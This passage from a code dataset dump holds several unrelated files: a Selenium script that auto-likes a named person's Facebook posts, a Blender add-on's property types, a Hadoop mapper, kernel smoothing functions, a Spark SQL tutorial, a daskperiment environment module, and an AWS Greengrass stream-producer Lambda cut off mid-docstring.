selenium.common.exceptions import TimeoutException\r\nfrom selenium.webdriver.remote.webelement import WebElement\r\nimport time\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nimport sys\r\nsearch_name=\"nirmal patel\" #default name in case one forgot to enter name\r\nif len(sys.argv) > 1:\r\n\tsearch_name=' '.join(sys.argv[1:])\r\nelse:\r\n\tprint(\"name required to search\")\r\n\r\ndef page_unlike():\r\n\tbrowser.find_element_by_xpath('//*[@data-click=\"home_icon\"]').click()\t#Home button xpath and 
click.\r\n\ttime.sleep(1)\r\n\tbrowser.find_element_by_xpath('//*[@title=\"Pages\"]').click()\r\n\ttime.sleep(2)\r\n\tbrowser.find_element_by_xpath('//*[@role=\"tablist\"]/li[3]/a').click()\r\n\ttime.sleep(2)\r\n\tpages=browser.find_elements_by_xpath('//*[@id=\"all_liked_pages\"]/div/div')\r\n\tfor page in pages:\r\n\t\tpage.find_element_by_xpath('./div/div/div[2]/div/button').click()\r\n\r\n\r\ntemp=time.time()\r\nchrome_options = webdriver.ChromeOptions()\r\nprefs = {\"profile.default_content_setting_values.notifications\" : 2}\r\nchrome_options.add_experimental_option(\"prefs\",prefs)\r\nbrowser= webdriver.Chrome(options=chrome_options,executable_path=r\"C:\\Program Files\\Python37\\chromedriver\")\r\nbrowser.maximize_window()\r\n\r\nbrowser.get(\"https://en-gb.facebook.com/login/\")\r\n# username\r\nbrowser.find_element_by_xpath('//*[@id=\"email\"]').send_keys('USERNAME HERE')\r\ntime.sleep(1)\r\n# password\r\nbrowser.find_element_by_xpath('//*[@id=\"pass\"]').send_keys('paSSWORD HERE')\r\ntime.sleep(1)\r\n# login click()\r\nbrowser.find_element_by_xpath('//*[@id=\"loginbutton\"]').click()\r\ntime.sleep(1)\r\n# type name to search\r\nbrowser.find_element_by_xpath('//input[@name=\"q\"]').send_keys(search_name)\r\n# click search\r\nbrowser.find_element_by_xpath('//button[@data-testid=\"facebar_search_button\"]').click()\r\ntime.sleep(5)\r\n\r\nmain_div=browser.find_element_by_xpath('//div[@class=\"_6rbb\"]')\r\nprint(main_div)\r\ndivs=main_div.find_elements_by_xpath('./div')\r\nprint(divs)\r\nnirmal_profile=divs[0].find_element_by_xpath('./div/div/div/div/div/div/div/a').get_attribute('href')\r\ntime.sleep(1)\r\nbrowser.get(nirmal_profile)\r\ntime.sleep(5)\r\nbrowser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\r\ntime.sleep(1)\r\nbrowser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\r\ntime.sleep(3)\r\ntimeline=browser.find_elements_by_xpath('//div[@class=\"rq0escxv l9j0dhe7 du4w35lb d2edcug0 gile2uim buofh1pr g5gj957u hpfvmrgz aov4n071 oi9244e8 bi6gxh9e h676nmdw\"]/div')\r\ntimeline.pop(0)\r\nbrowser.execute_script(\"window.scrollTo(0,0);\")\r\nprint(len(timeline),type(timeline))\r\n\r\nfor post in timeline:\r\n\ttry:\r\n\t\tif post.find_element_by_xpath('./div/div/div/div[2]/div/div[4]/div[1]/div/div/span[1]/div/div/div').get_attribute('aria-label')=='Like':\r\n\t\t\taction = ActionChains(browser)\r\n\t\t\thover=post.find_element_by_xpath('./div/div/div/div[2]/div/div[4]/div[1]/div/div/span[1]/div/div/div')\r\n\t\t\t# //div[@aria-label=\"Reactions\"]')\r\n\t\t\taction.move_to_element(hover).perform()\r\n\t\t\ttime.sleep(0.7)\r\n\t\t\thover.click()\r\n\t\t\ttime.sleep(1)\r\n\t\telse:\r\n\t\t\tprint('already liked')\r\n\texcept:\r\n\t\tprint(\"exception in like\")\r\n\t\r\n\t\r\n\r\npage_unlike()\r\nprint(\"time taken:\",time.time()-temp)\r\n\r\n\r\n\r\n\r\n","repo_name":"nicpatel963/Facebook-Automation","sub_path":"facebook_auto_like.py","file_name":"facebook_auto_like.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"508561430","text":"from bpy.utils import register_class, unregister_class\nfrom bpy.types import Scene, Object, Material, PropertyGroup\nfrom bpy.props import StringProperty, EnumProperty, FloatProperty, IntProperty, PointerProperty, BoolProperty\n\n# --- --- --- --- ---\n\ndef BM_setUshort(self, value):\n self = max(0, min(value, 65536));\n\n# --- --- --- --- ---\n\nBM_Classes = [\n (\"static\", \"Static\", \"Terrain, 
building or background prop\"),\n (\"actor\", \"Actor\", \"Player or NPC\"),\n (\"arma\", \"Armature\", \"Custom armature logic\"),\n ];\n\nBM_ObjectAttrs = [\n [\"meshid\", IntProperty,\n {\"name\":\"Mesh Nº\", \"default\":0,\n \"description\":\"Object's position in the mesh archive.\"\n + \" May not be higher than 255 or the archive's element count\"}],\n\n [\"kls\", EnumProperty,\n {\"items\":BM_Classes, \"name\":\"Type\",\n \"description\":\"Class mutation to be applied ingame\"}],\n\n [\"displayName\", StringProperty,\n {\"name\":\"Name\", \"default\":\"Object\",\n \"description\":\"Non-unique name to be displayed ingame. Can be left blank\"}],\n \n [\"weight\", FloatProperty,\n {\"name\":\"Weight\", \"default\":1.0,\n \"description\":\"Multiplier used by custom physics\"}]\n ];\n\nstatic_attrs = [\"displayName\", \"weight\"];\n\n# --- --- --- --- ---\n\nclass BM_ObjectSettings(PropertyGroup):\n\n arc_offset = IntProperty (name = \"\", default = 0, min = 0, max = 255,\n description = \"DAF file mesh slot\" );\n\n# --- --- --- --- ---\n\nclass BM_SceneSettings(PropertyGroup):\n\n resourceID = IntProperty (name = \"ResourceID\", default = 0, min = 0, max = 65535,\n description = \"ID of the resource this object belongs to;\"\n + \" used as index into a BM_Resource array\" );\n\n mesharch = StringProperty (name = \"MeshArchive\", default = \"M000\",\n description = \"Name of DAF mesh file to write to\" );\n\n texarch = StringProperty (name = \"MateArchive\", default = \"T000\",\n description = \"Name of DAF material file to write to\" );\n\n curmat = PointerProperty(name = \"\", type = Material,\n description = \"Selected material for adjusting settings & exporting\");\n\n curobj = PointerProperty(name = \"\", type = Object,\n description = \"Selected object for adjusting settings & exporting\" );\n\n# --- --- --- --- ---\n\nBM_MaterialPresets = [\n (\"default\", \"Default\", \"Specular, opaque, no faux reflections\" ),\n (\"glass\", \"Glass\", \"Specular, transparency, faux reflections\" ),\n (\"glow\", \"Glow\", \"No specular, transparency, radiance\" ),\n\n (\"metalness\", \"Metalness\", \"Specular, opaque, faux reflections\" ),\n (\"metalglass\", \"MetalGlass\", \"Uses glowmap to combine glass and metalness\" ),\n (\"metalglow\", \"MetalGlow\", \"Uses glowmap to combine glow and metalness\" ),\n\n (\"sprite\", \"Sprite\", \"Cam-aligned plane, has animations\" ),\n (\"billboard\", \"Billboard\", \"Cam-aligned plane, no animations\" ),\n ];\n\nBM_MaterialFlags = { \n \"Specular\" : 0x01,\n \"Opaque\" : 0x02,\n \"Reflective\" : 0x04,\n \"Metallic\" : 0x08,\n \"Radiance\" : 0x10,\n \"Animated\" : 0x20,\n \"Sprite\" : 0x40,\n \"NonMat\" : 0x80\n };\n\ndef BM_Material_onPresetChange(self, context):\n\n scene = context.scene;\n mate = scene.BlackMagic.curmat;\n\n newkls = mate.BlackMagic.preset;\n\n if newkls in [\"default\", \"glass\", \"metalness\", \"metalglass\", \"metalglow\", \"billboard\", \"sprite\"]:\n\n mate.BlackMagic.num_textures = 3;\n\n if newkls == \"default\" :\n mate.BlackMagic.shader = 0;\n mate.BlackMagic.flags = (BM_MaterialFlags[\"Specular\" ]\n | BM_MaterialFlags[\"Opaque\" ]);\n\n elif newkls == \"glass\" :\n mate.BlackMagic.shader = 1;\n mate.BlackMagic.flags = (BM_MaterialFlags[\"Specular\" ]\n | BM_MaterialFlags[\"Reflective\"]);\n\n elif newkls == \"metalness\" :\n mate.BlackMagic.shader = 2;\n mate.BlackMagic.flags = (BM_MaterialFlags[\"Specular\" ]\n | BM_MaterialFlags[\"Opaque\" ]\n | BM_MaterialFlags[\"Metallic\" ]\n | BM_MaterialFlags[\"Reflective\"]);\n\n 
elif newkls == \"metalglass\":\n mate.BlackMagic.shader = 3;\n mate.BlackMagic.flags = (BM_MaterialFlags[\"Specular\" ]\n | BM_MaterialFlags[\"Metallic\" ]\n | BM_MaterialFlags[\"Reflective\"]);\n\n elif newkls == \"metalglow\" :\n mate.BlackMagic.shader = 4;\n mate.BlackMagic.flags = (BM_MaterialFlags[\"Specular\" ]\n | BM_MaterialFlags[\"Metallic\" ]\n | BM_MaterialFlags[\"Reflective\"]\n | BM_MaterialFlags[\"Radiance\" ]);\n\n elif newkls == \"billboard\" :\n mate.BlackMagic.shader = 5;\n mate.BlackMagic.flags = (BM_MaterialFlags[\"Specular\" ]\n | BM_MaterialFlags[\"Opaque\" ]\n | BM_MaterialFlags[\"Sprite\" ]);\n\n elif newkls == \"sprite\" :\n mate.BlackMagic.shader = 6;\n mate.BlackMagic.flags = (BM_MaterialFlags[\"Specular\" ]\n | BM_MaterialFlags[\"Opaque\" ]\n | BM_MaterialFlags[\"Sprite\" ]\n | BM_MaterialFlags[\"Animated\" ]);\n\n elif newkls == \"glow\":\n\n mate.BlackMagic.shader = 7;\n mate.BlackMagic.num_textures = 2;\n mate.BlackMagic.flags = BM_MaterialFlags[\"Radiance\"];\n\nclass BM_MaterialSettings(PropertyGroup):\n\n preset = EnumProperty (items = BM_MaterialPresets, name = \"\", default = \"default\",\n description = \"Determines SIN shader for this material & some export settings\",\n update = BM_Material_onPresetChange );\n\n num_textures = IntProperty (name = \"\", default = 3, min = 0, max = 255,\n description = \"Number of texture maps to export\" );\n\n tex_offset = IntProperty (name = \"\", default = 0, min = 0, max = 255,\n description = \"DAF file texture slot\" );\n\n mat_offset = IntProperty (name = \"\", default = 0, min = 0, max = 255,\n description = \"DAF file material slot\" );\n\n matid = IntProperty (name = \"\", default = 1, min = 1, max = 65535,\n description = \"Unique material ID (nonzero)\" );\n\n flags = IntProperty (default = BM_MaterialFlags[\"Specular\"] | BM_MaterialFlags[\"Opaque\"] );\n\n shader = IntProperty (default = 0 );\n\n spec_mult = FloatProperty(name = \"\", default = 0.65, min = 0, max = 1.49,\n description = \"Intensity factor for specular\" );\n\n diff_mult = FloatProperty(name = \"\", default = 0.50, min = 0, max = 1.49,\n description = \"Intensity factor for diffuse\" );\n\n ref_mult = FloatProperty(name = \"\", default = 0.75, min = 0, max = 1.49,\n description = \"Intensity factor for faux-reflections\" );\n\n glow_rea = FloatProperty(name = \"\", default = 2.00, min = 0, max = 8.00,\n description = \"Effective distance for the radiance effect\" );\n\n# --- --- --- --- ---\n\ndef register():\n\n Scene.BlackMagic = PointerProperty(type = BM_SceneSettings );\n Object.BlackMagic = PointerProperty(type = BM_ObjectSettings );\n Material.BlackMagic = PointerProperty(type = BM_MaterialSettings);\n\ndef unregister():\n \n del Scene.BlackMagic;\n del Object.BlackMagic;\n del Material.BlackMagic;\n\n# --- --- --- --- ---\n","repo_name":"Liebranca/DSM","sub_path":"src/BlackMagic/BM_types.py","file_name":"BM_types.py","file_ext":"py","file_size_in_byte":9667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5341980335","text":"#!/usr/bin/python\nimport sys\nfor line in sys.stdin:\n line = line.strip()\n items = line.split(',')\n rates = items[3].strip('\" ')\n if len(rates) < 2:\n continue\n label = float(items[2])\n num = abs(int(100 * label))\n if num == 0 :\n continue\n if label > 0:\n nl = 1\n else:\n nl = -1\n rs = '%d | %s\\n'%(nl, rates)\n sys.stdout.write(rs * 
num)\n\n\n","repo_name":"adayone/sk","sub_path":"binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"11476116454","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nRGB_MIN_VALUE = 0\nRGB_MAX_VALUE = 255\n\nGRAYSCALE_MIN_VALUE = 0\nGRAYSCALE_MAX_VALUE = 255\n\n# ν˜Έν™˜ μ„€μ •\nfrom .. import image\nimage.RGB_MIN_VALUE = RGB_MIN_VALUE\nimage.RGB_MAX_VALUE = RGB_MAX_VALUE\nimage.GRAYSCALE_MIN_VALUE = GRAYSCALE_MIN_VALUE\nimage.GRAYSCALE_MAX_VALUE = GRAYSCALE_MAX_VALUE\n","repo_name":"Thestars3/pyufp","sub_path":"ufp/_compatibleness/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"30808387832","text":"import math\nimport typing\nimport numpy as np\n\n\ndef rationalQuadratic(\n data_source: np.ndarray[np.float64],\n look_back: int,\n relative_weight: float,\n start_at_Bar: int,\n):\n yhat: typing.List[float] = []\n start_at_Bar += 1 # because this is 1 on tv: _size = array.size(array.from(_src))\n for index in range(start_at_Bar, len(data_source)):\n _currentWeight: float = 0\n _cumulativeWeight: float = 0\n for bars_back_index in range(0, start_at_Bar):\n y = data_source[index - bars_back_index]\n w = pow(\n 1\n + (\n pow(bars_back_index, 2)\n / ((pow(look_back, 2) * 2 * relative_weight))\n ),\n -relative_weight,\n )\n _currentWeight += y * w\n _cumulativeWeight += w\n yhat.append(_currentWeight / _cumulativeWeight)\n return np.array(yhat)\n\n\ndef gaussian(\n data_source: np.ndarray[np.float64], look_back: int, start_at_Bar: int\n):\n start_at_Bar += 1\n yhat: typing.List[float] = []\n for index in range(start_at_Bar, len(data_source)):\n _currentWeight: float = 0\n _cumulativeWeight: float = 0\n for bars_back_index in range(0, start_at_Bar):\n y = data_source[index - bars_back_index]\n w = math.exp(-pow(bars_back_index, 2) / (2 * pow(look_back, 2)))\n _currentWeight += y * w\n _cumulativeWeight += w\n yhat.append(_currentWeight / _cumulativeWeight)\n return np.array(yhat)","repo_name":"wesley1001/fictional-trading","sub_path":"src/trader/strategies/kernel_functions/kernel.py","file_name":"kernel.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29012299038","text":"### Before we can write and run SQL queries, we need to tell Spark to treat the DataFrame as a SQL table\n### To register a DataFrame as a table, call the registerTempTable() method on that DataFrame object. 
This method requires one string parameter, name, \n### that we use to set the table name for reference in our SQL queries.\n\n\n# step1\n### Use the registerTempTable() method to register the DataFrame df as a table named census2010\n### Then, run the SQLContext method tableNames to return the list of tables.\nfrom pyspark.sql import SQLContext\nsqlCtx = SQLContext(sc)\ndf = sqlCtx.read.json(\"census_2010.json\")\ndf.registerTempTable('census2010')\ntables = sqlCtx.tableNames()\nprint(tables)\n\n# step2\n### Write a SQL query that returns the age column from the table census2010, and use the show() method to display the first 20 results.\nquery = 'SELECT age FROM census2010'\nsqlCtx.sql(query).show(20)\n\n# step3\n### The males and females columns (in that order) where age > 5 and age < 15\nquery = 'select males,females from census2010 where age > 5 and age < 15'\nsqlCtx.sql(query).show()\n\n# step4\n### Write a SQL query that returns a DataFrame containing the males and females columns from the census2010 table.\n### Use the describe() method to calculate summary statistics for the DataFrame and the show() method to display the results.\nquery = 'select males,females from census2010'\nsqlCtx.sql(query).describe().show()\n\n# step5\n### Read these additional datasets into DataFrame objects and then use the registerTempTable() function \n### to register these tables individually within SQLContext:\ndf_2000 = sqlCtx.read.json(\"census_2000.json\")\ndf_1990 = sqlCtx.read.json(\"census_1990.json\")\ndf_1980 = sqlCtx.read.json(\"census_1980.json\")\n\ndf_2000.registerTempTable('census2000')\ndf_1990.registerTempTable('census1990')\ndf_1980.registerTempTable('census1980')\ntables = sqlCtx.tableNames()\nprint(tables)\n\n# step6\n### Write a query that returns a DataFrame with the total columns for the tables census2010 and census2000 (in that order)\nquery = \"\"\"\n select census2010.total, census2000.total\n from census2010\n inner join census2000\n on census2010.age=census2000.age\n\"\"\"\n\nsqlCtx.sql(query).show()\n\n\n### The functions and operators from SQLite that we've used in the past are available for us to use in Spark SQL:\n\n### COUNT()\n### AVG()\n### SUM()\n### AND\n### OR\n\n\n\n# step7\n### Write a query that calculates the sums of the total column from each of the tables, in the following order\nquery = \"\"\"\n select sum(census2010.total), sum(census2000.total), sum(census1990.total)\n from census2010\n inner join census2000\n on census2010.age=census2000.age\n inner join census1990\n on census2010.age=census1990.age\n\"\"\"\nsqlCtx.sql(query).show()","repo_name":"jason-jz-zhu/dataquest","sub_path":"Data Scientist/Working With Large Datasets/Spark SQL.py","file_name":"Spark SQL.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6603797416","text":"import os\n\nfrom daskperiment.backend import init_backend\nfrom daskperiment.core.errors import TrialIDNotFoundError\nfrom daskperiment.environment.platform import (PlatformEnvironment,\n DetailedCPUEnvironment)\nfrom daskperiment.environment.python import (PythonEnvironment,\n PythonPackagesEnvironment,\n NumPyEnvironment,\n SciPyEnvironment,\n PandasEnvironment,\n CondaEnvironment)\nfrom daskperiment.environment.git import GitEnvironment\nfrom daskperiment.util.log import get_logger\n\n\nlogger = get_logger(__name__)\n\n\nclass Environment(object):\n\n def __init__(self, backend):\n self.backend = 
init_backend(backend=backend)\n\n        self.python = PythonEnvironment()\n        self.python_packages = PythonPackagesEnvironment()\n\n        self.collectors = [PlatformEnvironment(),\n                           DetailedCPUEnvironment(),\n                           self.python,\n                           NumPyEnvironment(),\n                           SciPyEnvironment(),\n                           PandasEnvironment(),\n                           CondaEnvironment(),\n                           GitEnvironment(),\n                           self.python_packages]\n        self.mapping = {env.key: env for env in self.collectors}\n\n    def keys(self):\n        return [env.key for env in self.collectors]\n\n    def log_environment_info(self):\n        for env in self.collectors:\n            for line in env.output_init():\n                logger.info(line)\n\n    def _load_single_environment(self, env, trial_id):\n        \"\"\"\n        Load single environment instance\n        \"\"\"\n        if trial_id is None:\n            return env\n\n        key = self.backend.get_environment_key(env.key, trial_id, env.ext)\n        try:\n            text = self.backend.load_text(key)\n        except TrialIDNotFoundError:\n            # overwrite message using trial_id\n            raise TrialIDNotFoundError(trial_id)\n        return env.loads(text)\n\n    def check_environment_change(self, trial_id):\n        for env in self.collectors:\n            try:\n                prev = self._load_single_environment(env, trial_id)\n            except TrialIDNotFoundError:\n                # file or db row may be deleted\n                msg = ('Unable to load saved environment, '\n                       'comparison is skipped: '\n                       '(key: {}, trial id: {})')\n                logger.error(msg.format(env.key, trial_id))\n                continue\n\n            diff = env.difference_from(prev)\n            if diff is not None:\n                msg = \"Environment information has been changed: {}\"\n                logger.warning(msg.format(env.key))\n                for d in diff:\n                    logger.warning(d)\n\n    def get_python_mode(self):\n        return self.python.get_python_mode()\n\n    def maybe_file(self):\n        return self.python.maybe_file()\n\n    def maybe_jupyter(self):\n        return self.python.maybe_jupyter()\n\n    def save(self, trial_id):\n        for env in self.collectors:\n            key = self.backend.get_environment_key(env.key, trial_id, env.ext)\n            logger.debug('Saving {} info: {}'.format(env.key, key))\n            self.backend.save_text(key, env.dumps())\n\n    def get_environment(self, trial_id=None, category=None):\n        if category is None:\n            # compat for previous behaviour\n            envs = [self.mapping['platform'],\n                    self.mapping['python'],\n                    self.mapping['git']]\n            envs = [self._load_single_environment(e, trial_id=trial_id)\n                    for e in envs]\n            lines = [os.linesep.join(e.output_init()) for e in envs]\n            return os.linesep.join(lines)\n        else:\n            category = str(category).lower()\n\n            try:\n                env = self.mapping[category]\n            except KeyError:\n                msg = 'Category must be either {}, given: {}'\n                msg = msg.format(','.join(self.mapping.keys()), category)\n                raise ValueError(msg)\n\n            try:\n                env = self._load_single_environment(env, trial_id)\n            except TrialIDNotFoundError:\n                msg = ('Unable to load saved environment: '\n                       '(key: {}, trial id: {})')\n                logger.error(msg.format(env.key, trial_id))\n                raise\n            return env.output_detail()\n\n    def get_python_packages(self, trial_id=None):\n        # TODO: deprecate?\n        return self.get_environment(trial_id=trial_id,\n                                    category='requirements')\n","repo_name":"sinhrks/daskperiment","sub_path":"daskperiment/environment/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"34"} +{"seq_id":"40425011310","text":"import numpy as np\nimport multiprocessing\nfrom .util import compute_connected_average\nfrom .element import factory as element_factory\n\n__all__ = [\n    \"compute_element_centers\",\n    \"compute_edge_centers\",\n    \"compute_face_centers\",\n    \"compute_element_length\",\n    
\"compute_element_volumes\",\n \"compute_volume_averaged_elem_variable\",\n \"compute_node_volumes\",\n \"compute_node_variable_values_at_element_center\",\n]\n\n\ndef compute_element_centers(file, block_id=None, time_step=None):\n \"\"\"Computes the element geometric center.\n\n Parameters\n ----------\n block_id : int\n element block ID (not INDEX)\n time_step : int\n 1-based index of time step\n\n Returns\n -------\n centers : ndarray of float\n\n Note\n ----\n If `time_step` is not None, the center of the element displacement is computed\n\n \"\"\"\n if block_id is None:\n # compute centers for all blocks\n centers = []\n for id in file.get_element_block_ids():\n centers.append(compute_element_centers(file, id, time_step=time_step))\n return np.concatenate(centers, axis=0)\n else:\n conn = file.get_element_conn(block_id) - 1\n coords = file.get_coords(time_step=time_step)\n return compute_connected_average(conn, coords)\n\n\ndef compute_element_length(file, time):\n \"\"\"Calculate the characteristic element length.\n\n The length of a 3D element is the cube root of the volume; for a 2D element\n it is the square root of the area.\n\n The characteristic element length is the average element length over the mesh.\n \"\"\"\n\n time_step = file.get_time_step(time)\n\n ndim = file.num_dimensions()\n dexp = 1.0 / ndim\n\n length = 0.0\n for block_id in file.get_element_block_ids():\n vols = compute_element_volumes(file, block_id, time_step=time_step)\n length += np.sum(np.power(np.abs(vols), dexp))\n\n return length / file.num_elems()\n\n\ndef compute_edge_centers(file, block_id=None, time_step=None):\n \"\"\"Computes the edge geometric center.\n\n Parameters\n ----------\n block_id : int\n edge block ID (not INDEX)\n time_step : int\n 1-based index of time step\n\n Returns\n -------\n centers : ndarray of float\n\n Note\n ----\n If `time_step` is not None, the center of the edge displacement is computed\n\n \"\"\"\n if block_id is None:\n # compute centers for all blocks\n centers = []\n for id in file.get_edge_block_ids():\n centers.append(compute_edge_centers(file, id, time_step=time_step))\n return np.concatenate(centers, axis=0)\n else:\n conn = file.get_edge_block_conn(block_id) - 1\n coords = file.get_coords(time_step=time_step)\n return compute_connected_average(conn, coords)\n\n\ndef compute_face_centers(file, block_id=None, time_step=None):\n \"\"\"Computes the face geometric center.\n\n Parameters\n ----------\n block_id : int\n face block ID (not INDEX)\n time_step : int\n 1-based index of time step\n\n Returns\n -------\n centers : ndarray of float\n\n Note\n ----\n If `time_step` is not None, the center of the face displacement is computed\n\n \"\"\"\n if block_id is None:\n # compute centers for all blocks\n centers = []\n for id in file.get_face_block_ids():\n centers.append(compute_face_centers(file, id, time_step=time_step))\n return np.concatenate(centers, axis=0)\n else:\n conn = file.get_face_block_conn(block_id) - 1\n coords = file.get_coords(time_step=time_step)\n return compute_connected_average(conn, coords)\n\n\ndef compute_node_variable_values_at_element_center(\n file, block_id, var_name, time_step=None\n):\n \"\"\"Computes the value of a node variable at an element's center\n\n Parameters\n ----------\n block_id : int\n element block ID (not INDEX)\n var_name : str\n The nodal variable name\n time_step : int\n 1-based index of time step\n\n Returns\n -------\n data : ndarray of float\n\n \"\"\"\n if block_id is None:\n # compute for all blocks\n data = []\n for 
id in file.get_element_block_ids():\n x = compute_node_variable_values_at_element_center(\n file, id, var_name, time_step=time_step\n )\n data.append(x)\n return np.concatenate(data, axis=0)\n else:\n if var_name == \"coordinates\":\n nvars = file.get_coords()\n elif var_name == \"displacements\":\n nvars = file.get_displ(time_step)\n else:\n nvars = file.get_node_variable_values(var_name, time_step=time_step)\n conn = file.get_element_conn(block_id) - 1\n return compute_connected_average(conn, nvars)\n\n\ndef compute_node_volumes(file, time_step=None):\n \"\"\"Get the node volumes at the time index specified. The time index is\n 1-based. If provided, vol_array must be an array.array object of type\n storageType(), which is filled with the values; otherwise it is created.\"\"\"\n\n # Basic strategy: For each block, first get the element volumes\n # then distribute the element volumes to the nodes.\n vol = np.zeros(file.num_nodes())\n\n for block_id in file.get_element_block_ids():\n blk = file.get_element_block(block_id)\n\n nodes_per_i = 1.0 / blk.num_elem_nodes\n\n # Get the element volumes for a block, then partition the volume\n # to the element's nodes\n element_volumes = compute_element_volumes(file, block_id, time_step)\n\n conn = file.get_element_conn(block_id) - 1\n # Now, partition the element volume and distribute it to the nodes.\n for element in range(blk.num_block_elems):\n node_vol_part = nodes_per_i * element_volumes[element]\n vol[conn[element]] += node_vol_part\n\n return vol\n\n\ndef compute_volume_averaged_elem_variable(\n file, block_id, time_step, func, intervals=5, zfill=None, processes=None\n):\n \"\"\"Get the cell-average of a variable for block block_id at time_step.\n\n If the exoobj mesh is 2D and zfill is provided, zfill is appended to the x\n and y values in restructured_coords for all nodes.\n\n \"\"\"\n processes = processes or 1\n\n # Get the time that matches the solution time_index (which\n # might not be the same as the test_time)\n exact_time = file.get_time(time_step)\n\n elem_blk = file.get_element_block(block_id)\n elem_type = elem_blk.elem_type\n\n coord = file.get_coords(time_step=time_step)\n if file.num_dimensions() == 2 and zfill is not None:\n coord = np.column_stack((coord, np.zeros(coord.shape[0])))\n\n conn = file.get_element_conn(block_id) - 1\n if processes <= 2:\n averaged = _compute_ave(elem_type, func, exact_time, conn, coord, intervals)\n else:\n count = elem_blk.num_block_elems\n nproc = processes - 1\n pipes = [(None, None) for i in range(nproc)]\n procs = [None for i in range(nproc)]\n for procno in range(nproc):\n start = int((procno * count) / nproc)\n end = int(((procno + 1) * count) / nproc)\n pipes[procno] = multiprocessing.Pipe(False)\n p = multiprocessing.Process(\n target=_compute_ave,\n args=(\n elem_type,\n func,\n exact_time,\n conn[start:end],\n coord,\n intervals,\n pipes[procno][1],\n ),\n )\n procs[procno] = p\n p.start()\n averaged = np.zeros(count)\n for procno in range(nproc):\n p = procs[procno]\n start = int((procno * count) / nproc)\n end = int(((procno + 1) * count) / nproc)\n pipe = pipes[procno][0]\n averaged[start:end] = pipe.recv()\n pipe.close()\n p.join()\n\n return averaged\n\n\ndef _compute_ave(elem_type, fun, time, conn, coord, intervals, pipe=None):\n averaged = np.zeros(len(conn))\n for (iel, ix) in enumerate(conn):\n el = element_factory(elem_type, coord[ix])\n centers = el.subdiv(intervals)\n vols = el.subvols(intervals)\n exact = np.array([fun(x, time) for x in centers])\n averaged[iel] = 
np.sum(vols * exact) / np.sum(vols)\n    if pipe is None:\n        return averaged\n    else:\n        pipe.send(averaged)\n        pipe.close()\n\n\ndef compute_element_volumes(file, block_id, time_step=None):\n    \"\"\"Computes the element volumes.\n\n    Parameters\n    ----------\n    block_id : int\n        element block ID (not INDEX)\n    time_step : int\n        1-based index of time step\n\n    Returns\n    -------\n    volumes : ndarray of float\n\n    Note\n    ----\n    If `time_step` is not None, the volume of the displaced element is computed\n\n    \"\"\"\n    coords = file.get_coords(time_step=time_step)\n    elem_blk = file.get_element_block(block_id)\n    efactory = lambda x: element_factory(elem_blk.elem_type, x)\n\n    # Connectivity is 1 based\n    conn = file.get_element_conn(block_id) - 1\n\n    # Now, compute the volumes.\n    vol = np.zeros(elem_blk.num_block_elems)\n    for (iel, ix) in enumerate(conn):\n        el = efactory(coords[ix])\n        vol[iel] = el.volume\n\n    return vol\n","repo_name":"sandialabs/exodusii","sub_path":"exodusii/extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":9247,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"70174980897","text":"# Greengrass lambda source - stream producer\n\nimport os\nimport json\nimport logging\nimport greengrasssdk\nfrom greengrasssdk.stream_manager import (\n    StreamManagerClient,\n    ReadMessagesOptions,\n    NotEnoughMessagesException,\n    MessageStreamDefinition,\n    StrategyOnFull,\n    ExportDefinition,\n    IoTAnalyticsConfig,\n    InvalidRequestException,\n    StreamManagerException,\n    Persistence,\n)\n\n# Configure logger\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nchannel_name = os.environ[\"STREAM_MANAGER_CHANNEL\"]\nclient = StreamManagerClient()\n\n\ntry:\n    # The LocalDataStream is the low-priority source of incoming sensor data for the\n    # aggregator function. \n    client.create_message_stream(\n        MessageStreamDefinition(\n            name=\"LocalDataStream\",  # Required.\n            max_size=268435456,  # Default is 256 MB.\n            stream_segment_size=16777216,  # Default is 16 MB.\n            time_to_live_millis=None,  # By default, no TTL is enabled.\n            strategy_on_full=StrategyOnFull.OverwriteOldestData,  # Required.\n            persistence=Persistence.File,  # Default is File.\n            flush_on_write=False,  # Default is false.\n            export_definition=ExportDefinition(\n                iot_analytics=[\n                    IoTAnalyticsConfig(\n                        identifier=\"RawData\",\n                        iot_channel=channel_name,\n                        # iot_msg_id_prefix=\"test\",\n                        # batch_size=1,\n                        # batch_interval_millis=1000,\n                        # priority=1\n                    )\n                ]\n            ),\n        )\n    )\nexcept StreamManagerException as e:\n    logger.error(f\"Error creating message stream: {e}\")\n    pass\nexcept Exception as e:\n    logger.error(f\"General exception error: {e}\")\n    pass\n\ndef main(event, context):\n    \"\"\"Invoked per incoming message\n    \n    This function is invoked every time a message is placed on an MQTT\n    topic where this function is the target. 
